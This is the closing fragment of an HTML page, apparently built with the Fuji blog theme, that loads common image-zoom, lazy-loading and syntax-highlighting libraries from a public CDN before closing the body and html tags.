<script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/lazysizes@5.3.0/lazysizes.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.23.0/components/prism-core.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.23.0/plugins/autoloader/prism-autoloader.min.js"></script>



<script defer src="/assets/js/fuji.min.js"></script>


</body>

</html>